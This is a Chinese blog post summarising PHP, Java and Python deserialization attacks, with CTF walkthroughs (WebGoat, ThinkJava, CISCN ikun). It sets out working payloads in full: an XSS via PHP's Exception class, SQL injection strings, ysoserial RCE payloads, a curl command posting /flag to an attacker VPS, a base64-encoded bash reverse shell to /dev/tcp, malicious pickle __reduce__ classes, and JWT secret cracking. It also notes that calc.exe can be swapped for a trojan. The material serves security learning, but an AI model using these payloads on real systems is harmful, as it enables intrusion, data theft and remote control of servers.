PHP/原生类/Java/Python反序列化总结

最新推荐文章于 2024-04-19 17:45:00 发布
最新推荐文章于 2024-04-19 17:45:00 发布
阅读量2w 收藏 17
点赞数 32
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74806534/article/details/135960400
版权

PHP反序列化

#方法&属性-调用详解&变量数据详解
对象变量属性:
public(公共的):在本类内部、外部类、子类都可以访问
protect(受保护的):只有本类或子类或父类中可以访问
private(私人的):只有本类内部可以使用
序列化数据显示:
private 属性序列化的时候格式是%00 类名%00 成员名
protect 属性序列化的时候格式是%00*%00 成员名
具体代码:
<?php
header("Content-type: text/html; charset=utf-8");
/*public private protected 说明
class test{
 public $name="1111";
 private $age="29";
 protected $sex="man";
}
$a=new test();
$a=serialize($a);
print_r($a);
*/
/*__construct __destruct 魔术方法 创建调用__construct 2 种销毁调用
__destruct
class Test{
    public $name;
    public $age;
    public $string;
 // __construct:实例化对象时被调用.其作用是拿来初始化一些值。
 public function __construct($name, $age, $string){
    echo "__construct 初始化"."<br>";
     $this->name = $name;
     $this->age = $age;
     $this->string = $string;
 }
 // __destruct:当删除一个对象或对象操作终止时被调用。其最主要的作用是拿
来做垃圾回收机制。
 /*
 * 当对象销毁时会调用此方法
 * 一是用户主动销毁对象,二是当程序结束时由引擎自动销毁

原生类

原生类搜索

<?php
$classes=get_declared_classes();
foreach ($classes as $class){
    $methods =get_class_methods($class);
    foreach ($methods as $method){
        if(in_array($method,array(
            //'__destruct',
            //'__toString',
            //'__wakeup',
            //'__call',
            //'__callStatic',
            //'__get',
            //'__set',
            //'__isset',
            //'__unset',
            //'__invoke',
            //'__set_state'
        ))){
            print $class . '::' . $method . "\n";
        }
    }
}

xss+原生类

<?php
highlight_file(_file_);
$a=unserialize($_GET['K']);
echo $a
?>

发现是echo可以想到__tostring函数但是没有tostring函数所以考虑到用tostring原生类Exception

<?php
try {
    throw new Exception("Some error message");
} catch(Exception $e) {
    echo $e;
}
?>意思会发回报错

那么直接构造poc

<?php
$a = new Exception("<script>alert('111')</script>");
echo urlencode(serialize($a));
?>

java反序列化

#前置知识:
序列化和反序列化的概念:
序列化:把 Java 对象转换为字节序列的过程。
反序列化:把字节序列恢复为 Java 对象的过程。
对象的序列化主要有两种用途:
把对象的字节序列永久地保存到硬盘上,通常存放在一个文件中;(持久化对象)
在网络上传送对象的字节序列。(网络传输对象)
函数接口:
Java: Serializable Externalizable 接口、fastjson、jackson、gson、
ObjectInputStream.read、ObjectObjectInputStream.readUnshared、
XMLDecoder.read、ObjectYaml.loadXStream.fromXML、
ObjectMapper.readValue、JSON.parseObject 等
PHP: serialize()、 unserialize() 
Python:pickle
数据出现:
1、功能特性:
反序列化操作一般应用在导入模板文件、网络通信、数据传输、日志格式化存储、对象数
据落磁盘、或 DB 存储等业务场景。因此审计过程中重点关注这些功能板块。
2、数据特性:
一段数据以 rO0AB 开头,你基本可以确定这串就是 JAVA 序列化 base64 加密的数据。
或者如果以 aced 开头,那么他就是这一段 java 序列化的 16 进制。
3、出现具体:
http 参数,cookie,sesion,存储方式可能是 base64(rO0),压缩后的
base64(H4s),MII 等 Servlets http,Sockets,Session 管理器,包含的协议就包

#原生 API-Ysoserial_URLDNS 使用
Serializable 接口
Externalizable 接口
没组件生成 DNS 利用:
https://github.com/frohoff/ysoserial
cmd命令java -jar ysoserial-0.0.6-SNAPSHOT-all.jar
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS "http://lfssr3.dnslog.cn" > a.txt
意思是ysoserial配合第三方使用DNSlog.cn

image-20231012194039961

当序列化a.txt文件时就会运行命令

下方就会出现地址

WebGoat java序列化

题目意思是更改提供的序列化让他延迟五秒

image-20231012195635641

发现开头 rO0AB,说明base64加密了,先解密

三方组件-Ysoserial_支持库生成使用
https://github.com/WebGoat/WebGoat
有组件生成 RCE:
1、生成:java -Dhibernate5 -cp hibernate-core-5.4.9.Final.jar;ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload Hibernate1 "calc.exe" > a.txt
生成序列化参数,之后进行base64编码,传入会弹出计算器
​
利用python编码:python java.py
import base64
file = open("a.txt","rb")
now = file.read()
ba = base64.b64encode(now)
print(ba)
file.close()
​
#解密分析-SerializationDumper 数据分析
https://github.com/NickstaDB/SerializationDumper
java -jar SerializationDumper-v1.13.jar -r urldns.ser >dns.txt

传入,成功弹出计算器,在实战中可以将calc.exe改为木马

image-20231012203154726

赛题-[网鼎杯 2020 朱雀组]ThinkJava

#CTF 赛题-[网鼎杯 2020 朱雀组]ThinkJava
0x01 注入判断,获取管理员帐号密码:
根据提示附件进行 javaweb 代码审计,发现可能存在注入漏洞
另外有 swagger 开发接口,测试注入漏洞及访问接口进行调用测试
数据库名:myapp,列名 name,pwd
注入测试:
POST /common/test/sqlDict
dbName=myapp?a=' union select (select name from user)#
dbName=myapp?a=' union select (select pwd from user)#
0x02 接口测试
/swagger-ui.html 接口测试:
{
"password":"admin@Rrrr_ctf_asde",
"username": "admin"

下载jar包,查看发现text.class里有

import io.swagger.annotations.ApiOperation;

直接访问swagger-ui.html,有三个路由,第三个功能,对应着jar包中Test.class,我们可以通过传dbName来进行sql注入

image-20231012212932028

看其他师傅解释

image-20231012213152565

查看数据库名字

select schema_name from information_schema.schemata;
效果相当于show databases;

image-20231012215019493

获取所有数据库的名字
dbName=myapp#' union select group_concat(SCHEMA_NAME)from(information_schema.schemata)#
结果
information_schema,myapp,mysql,performance_schema,sys

image-20231012215644092

dbName=myapp#' union select group_concat(column_name)from(information_schema.columns)where((table_schema='myapp')and(table_name='user'))#
结果
id,name,pwd

image-20231012215942380

获取字段值

dbName=myapp#' union select group_concat(id)from(user)#
结果 1
dbName=myapp#' union select group_concat(name)from(user)#
结果 admin
dbName=myapp#' union select group_concat(pwd)from(user)#
结果 admin@Rrrr_ctf_asde

然后将用户名admin和密码admin@Rrrr_ctf_asde在/common/user/login处提交,获取一串字符串

image-20231012220156891

ro0AB开头之前说过base64编码

使用bp插件java Deserialization Scanner分析

image-20231013083808576

发现有ROME

可以通过ysoserial利用

测试漏洞,打开DNSlog.cn

image-20231013184516738

命令

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS "http://ki4cxj.dnslog.cn" > f.bin

然后base64编码

image-20231013185139719

输入Bearer +编码的字符串

image-20231013185046122

返回刷新,就会发现有地址了

image-20231013184943902

方法一

curl将flag带出来

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "curl http://vps:4444 -d @/flag" > x.bin

然后base64编码,放在那个窗口

image-20231013193710158

监听,出现flag

image-20231013193456101

方法二

反弹shell

bash -i >& /dev/tcp/vps/5555 0>&1
进行base64编码,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMTExLjExMS4xMTEvNzAxNSAwPiYx

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjEzMC4yNS44Ni83MDE1IDA+JjE=}|{base64,-d}|{bash,-i}" > a.bin
python a.py
将生成的java序列化后的值传进/common/user/current

Python反序列化

#前置知识:
函数使用:
pickle.dump(obj, file) : 将对象序列化后保存到文件
pickle.load(file) : 读取文件, 将文件中的序列化内容反序列化为对象
pickle.dumps(obj) : 将对象序列化成字符串格式的字节流
pickle.loads(bytes_obj) : 将字符串格式的字节流反序列化为对象
魔术方法:
__reduce__() 反序列化时调用
__reduce_ex__() 反序列化时调用
__setstate__() 反序列化时调用
__getstate__() 序列化时调用
各类语言函数:
Java: Serializable Externalizable 接口、fastjson、jackson、gson、
ObjectInputStream.read、ObjectObjectInputStream.readUnshared、
XMLDecoder.read、ObjectYaml.loadXStream.fromXML、
ObjectMapper.readValue、JSON.parseObject 等
PHP: serialize()、 unserialize() 
Python:pickle marshal PyYAML shelve PIL unzip

代码演示

#原理-反序列化魔术方法-调用理解
-魔术方法利用:
__reduce__() 反序列化时调用
__reduce_ex__() 反序列化时调用
__setstate__() 反序列化时调用
__getstate__() 序列化时调用

-代码块:
import pickle
import os

#反序列化魔术方法调用-__reduce__() __reduce_ex__()__setstate__()
class A(object):
 	def __reduce__(self):
 		print('反序列化调用')
 		return (os.system,('calc',))
a = A()
p_a = pickle.dumps(a)
pickle.loads(p_a)
print('==========')
print(p_a)

class SerializePerson():
 	def __init__(self, name):
		 self.name = name
 # 构造 __setstate__ 方法
 	def __setstate__(self, name):
 		os.system('calc') # 恶意代码
tmp = pickle.dumps(SerializePerson('tom')) #序列化
pickle.loads(tmp) # 反序列化 此时会弹出计算器

#序列化魔术方法调用-__getstate__
class A(object):
 	def __getstate__(self):
 		print('序列化调用')
 		os.system('calc')
a = A()
p_a = pickle.dumps(a)
print('==========')
print(p_a)

#反序列化安全漏洞产生-DEMO
class A(object):
	def __init__(self,func,arg):
		self.func = func
		self.arg = arg
		print('this is A')
	def __reduce__(self):
		print('反序列化调用')
		return (self.func,self.arg)
a = A(os.system,('calc',))  //可以改成ipconfig
p_a = pickle.dumps(a)
pickle.loads(p_a)
print('=========')
print(p_a)

注意靶机的python环境,这编写payload时要用相应的python环境

[CISCN2019 华北赛区 Day1 Web2]ikun

可以看到标题说一定要买到lv6,让我看看怎么个事,查看器可以看到,有个lv4.png,所以解题思路就是找到lv6并买了

image-20231020214113267

发现有很多页,就只能用爬虫,爬取页面内容来查找

import requests,time

url="http://a6d161a6-ad0c-42ec-982c-af786251bc68.node4.buuoj.cn:81/shop?page="

for i in range(0,2000):
    time.sleep(0.2)
    r = requests.get(url+str(i))
    if 'lv6.png' in r.text:
        print(i)
        break
    else:
        print(str(i)+'|no')

找到在181页,直接去看看

image-20231020215254168

image-20231020215404969

我去有点贵买不起,抓个包看看,怎么回事

image-20231020215537816

试了试直接改价格不行,发现有个折扣,那我们直接让折扣对于0.000000000000000008试试

image-20231020215850841

发现OK,但是只允许admin访问

image-20231020215758175

那就要越权了,发现包里有JWT,解析一下看看

image-20231020220315866

不知道密匙,那就去爆破

下载好c-jwt-cracker

安装
docker build . -t jwtcrack
运行
docker run -it --rm  jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InN3cSJ9.TqygiKuMaNOivOr-B-UC5NQ17yTC0g7pVMgHz48v0ek

破解出来:1Kun

image-20231024215215239

然后更改如下,在将得到的JWT复制到数据包

image-20231024203712378

得到

image-20231024204419101

查看源代码

image-20231024204433860

下载然后审计,发现敏感函数

image-20231024211557081

写payload

import pickle
import urllib
class A(object):
	def __reduce__(self) :
		return (eval, ("open('/flag.txt','r').read()",))

a = pickle.dumps(A())
a = urllib.quote(a)
print(a)

python2运行payload

image-20231024215937223

可以发现那个函数在/b1g_m4mber页面下调用

image-20231024214556989

到该页面下查看确实有post传参

image-20231024215845624

更改value的值(上面payload运行的结果)然后再点击一键成为大会员

image-20231024220202083

就会出现flag

image-20231024220532500

python代码审计自动化工具

python代码审计自动化工具
dendit 
安装方式:pip install dendit
运行方式:dendit -r 需要审计的文件名称

小小邵同学
关注
  • 32
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
rogue_mysql_server:一个支持go,phppythonjava原生命令行等多种语言下客户端的mysql恶意服务器
03-19
流氓Mysql服务器基于实现的恶意mysql服务器,支持go,phppythonjava原生命令行等多种语言下的多种库的mysql客户端。...可控链接串的情况下可以利用mysql-connector-java反序列化入侵进行RCE配置文件示例:
protobuf-all-3.19.4.tar.gz
02-18
例如,可以生成C++、JavaPython,这些提供了序列化和反序列化protobuf消息的方法。 2. **库文件**:每个支持的语言(如cpp、javapython等)都有对应的库,允许你在代码中使用protobuf的功能。这些库通常...
Python PyYAML反序列化漏洞实验和Payload构造
3569
04-24 3416
0x01 概述什么程序存在漏洞:使用了PyYAML这个库并且使用了yaml.load而不是yaml.safe_load函数来解析yaml文件的程序代码审计关键词:import yamlyaml.load(已知相关漏洞:Remote Code Execution Vulnerability in Ansible-Vault Library. (CVE-2017-2809)https://pypi.p...
php中调用java_PHP中调用JAVA
weixin_34351588的博客
02-13 175
PHPJAVAJAVA是个非常强大的编程利器,它的扩展库也是非常的有用,这篇教程,主要讲述怎样使用PHP调用功能强大的JAVA 库(classes)。为了方便你的学习,这篇教程将包括JAVA的安装及一些基本的例子。windows下的安装第一步:安装JDK,这是非常容易的,你只需一路回车的安装好。然后做好以下步骤。在 Win9x 下加入 :“PATH=%PATH%;C:\jdk1.2.2\bin...
PHP反序列化【原理+CTF实战】
最新发布
2301_80127209的博客
04-19 894
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等.进行绕过,(在赛后我把题给Ssh1y写了,他的利用方式是nc反弹个shell,属实是开拓了我的眼界)。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。”,这显然就无法继续利用了。编码后在前部加7个1。
javaphp 区别或异同(整理、整合)
风.foxwho(神秘狐)
10-02 4780
收集了一下PHPJAVA语言的相同或不同之处(来源在末尾有出处),已备后续使用做参考,在下一篇文章再详细写出,相同或者不同,可以让我们快速入门JAVA 或者PHP。 风.fox编程范式:Java:纯面向对象的语言,有人说过:Java中一切皆对象!当然咯,人们都忘了Java的八种基本数据型:int、double、boolean、byte、float、 long、short、char。但是
PHP与JSP简单比较
kkwant的博客
12-27 2354
本文转载自:https://www.cnblogs.com/hughes5135/p/7446575.html 作者:hughes5135 转载请注明该声明。  比较PHP和JSP这两个Web开发技术,在目前的情况是其实是比较phpJava的Web开发。以下就几个主要方面进行的比较: 一、 语言比较   PHP是解释执行的服务器脚本语言,首先php有简单容易上手的特点。语法和C语言比较象,...
Order_订餐系统_cn.itcast.order_android_安卓shoplistview_服务器_
10-02
2. JSON序列化与反序列化:数据在服务器与客户端之间以JSON格式传输,Android端可能使用Gson或Jackson库处理这些数据。 3. 数据验证与安全:服务器端会对接收到的订单信息进行验证,防止恶意攻击,并确保用户数据的...
开源项目-google-protobuf.zip
09-05
之后,protobuf编译器会根据.proto文件生成对应语言(如C++、JavaPython等)的源代码,这些源代码提供了序列化和反序列化的API,使得程序能够方便地读写protobuf消息。 **protobuf v3.0.0版本特性** 在v3.0.0这...
xml格式数据和json相互转换的源码
07-13
首先,将XML解析为一个`JsonNode`对象,然后序列化成JSON字符串: ```java import com.fasterxml.jackson.databind.ObjectMapper; import com.fasterxml.jackson.dataformat.xml.XmlMapper; ObjectMapper xml...
javaphp
聆听岁月的博客
04-27 601
项目开发用php好,还是java好? 以前老是想这个问题。其实不管是php还是Java都各有千秋。 php 优点: 语法简单,对有程序基础的人员来说上手快。而且网上有大量网站的源代码,免费开源。运行速度快,适合中小型项目的开发。开发速度快。是目前网站开发语言中用的最多的。 缺点: 不适合开发大型项目java 优点: 语法简单,运行速度极快,相比于phpphp 每次运行都需要编译后才
phpjava什么关系_javaphp有什么区别
weixin_33846982的博客
02-25 1606
javaphp的区别有:1、Java支持服务器端和客户端,而PHP仅支持服务器端;2、在java中所有函数名,关键字,,变量等都是大小写敏感的,而在PHP中变量是大小写敏感的;3、Java适合于开发大型的应用系统,而PHP适合快速开发。javaphp的区别有:一、java的简单介绍Java是一种通用的面向对象编程语言,旨在生成可在任何地方使用相同代码的代码。这种编程语言是基于的,面向对象的...
phpJava的简单对比
weixin_43844718的博客
10-11 6327
综上所述,就Web开发而言,PHP适合于快速开发,中小型应用系统,开发成本低,能够对变动的需求作出快速的反应。而Java适合于开发大型的应用系统,应用的前景比较广阔,系统易维护、可复用性较好。还有,同样功能的系统用Java开发的系统要比PHP开发的系统的价格要高。而且Java本身就不是专门给WEB开发用的,所以Java开发电子商务的成本要远远高于PHP开发出来的同软件产品。
javaphp比较
生而为人我很抱歉
07-11 1254
JAVAbyte(1),short(2),int(4),long(8),float(4,F),double(8默认),char(2),boolean(1)基本对象数据型Byte,Short,Integet,Long,Float,Double,Character,Boolean。2.使用java是使用".“点号引用属性与方法,PHP是使用”->"引用属性与方法,没有点号用法。4.修饰符abstract(同),final(同),public(PHP没有,语法错误)...
PHPJava区别
会瘦的仙女璐璐的博客
08-21 1445
PHPJava区别 前言 由于工作原因,接触了PHP,其实一开始很不喜欢,因为我用过Java和C#,这两个语言在我这边都很像,相互感觉没什么太大门槛,由于不太喜欢公司给我的这个任务的心理,再看PHP代码页面,真的感觉太不优美了。 我用的是vscode,黑背景,页面看上去就是“黑的,白的,黄的,蓝的,绿的,紫的,橘的…”第一眼看上去我就感觉很乱,很乱很乱。但是!任务就是命令,抓紧时间拿下程序。所以第一个前端改修的项目只是简单的看了一下我用到的PHP代码部分,我想下一个应该不能用PHP了吧,我可能就回到舒适圈
PHPJava的区别和用处?答案在这里
DreamSun的博客
12-31 719
Java是一种通用的面向对象编程语言,旨在生成可在任何地方使用相同代码的代码。这种编程语言是基于的,面向对象的和人可读的。它支持服务器端和客户端。 Java既可以编译也可以解释。Java编译器将源代码转换为字节码,然后java解释器生成机器代码,该机器代码由运行java程序的机器直接执行。它可靠,分布式,便携。它可用于开发独立应用程序或基于Web的应用程序。 PHP被称为超文本预处理器,它是一种服务器端脚本语言。它是一种动态型语言,不需要编译代码;它是为Web开发目的而开发和设计的。 PHP受到.
PHP+Java来写Web应用
sinat_36735108的博客
11-17 1865
PHP是最好的语言,大家都知道。但这个语言有个缺点,就是无状态性。你想在php中hold一个连接池什么的,是做不到的。但php用来做前端页面确实方便,而且说句大不敬的,phper的工资也相对低不是吗? 这时候可以用php+java来解决。php解决前端问题,通过RPC(如thrift之)来调用后端Java写的业务层。php只管调用业务层,拿到处理处理后做前端展示。这样做需要解决一个问题
JavaPhp比较
weixin_41045487的博客
09-25 543
这样从几个方面来看: 一、运行机制: Java代码被编译成字节码后,会在虚拟机里由JIT进行二次编译成为本地码,据传言其执行速度可以和C++相媲美,经过我自己测试,用Java实现一个简单的Memcache协议的缓存服务器,在Java 1.6下运行,和memcache本身相比,同样数据量的存取时间比大概是3:2,虽然有差距,但是比想象的要好很多。Java 1.7在JIT方面做了大量的改进,性能比Java 1.6还要好。 PHP是直接对文本代码进行解释执行,即便有opcode缓存技术,仍然有不可逾越的性能鸿沟。
php java 选_phpjava如何选
weixin_36413546的博客
02-25 107
phpPHP 独特的语法混合了C、Java、Perl 以及 PHP 自创新的语法。它可以比 CGI 或者 Perl 更快速的执行动态网页PHP具有非常强大的功能,所有的CGI的功能PHP都能实现,而且支持几乎所有流行的数据库以及操作系统。最重要的是PHP可以用C、C++进行程序的扩展!优势1、开放的源代码:所有的PHP源代码都可以得到。2、PHP是免费的:和其它技术相比,PHP本身免费且是开源代码...
c# 原生代码进行反序列化
07-13
在 C# 中,可以使用`System.Text.Json`或`Newtonsoft.Json`等库来进行 JSON 反序列化。下面是一个示例代码: 使用 `System.Text.Json` 库: ```csharp using System; using System.IO; using System.Text.Json; /...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值